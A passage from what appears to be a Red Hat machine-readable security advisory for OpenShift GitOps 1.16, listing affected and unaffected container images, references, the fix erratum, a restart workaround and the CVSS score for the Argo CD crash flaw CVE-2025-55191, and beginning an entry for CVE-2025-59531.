"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-55191"
},
{
"category": "external",
"summary": "RHBZ#2400562",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400562"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-55191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55191"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55191"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/701bc50d01c752cad96185f848088d287a97c7b7",
"url": "https://github.com/argoproj/argo-cd/commit/701bc50d01c752cad96185f848088d287a97c7b7"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/pull/6103",
"url": "https://github.com/argoproj/argo-cd/pull/6103"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-g88p-r42r-ppp9",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-g88p-r42r-ppp9"
}
],
"release_date": "2025-09-30T22:52:19.838000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:47:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17730"
},
{
"category": "workaround",
"details": "Systems may be configured to automatically restart a service upon crash and doing so may partially mitigate the availability impact of this vulnerability.",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd/v2: github.com/argoproj/argo-cd/v3: Argo CD race condition leading to crash"
},
{
"cve": "CVE-2025-59531",
"cwe": {
"id": "CWE-248",
"name": "Uncaught Exception"
},
"discovery_date": "2025-10-01T21:03:46.509567+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
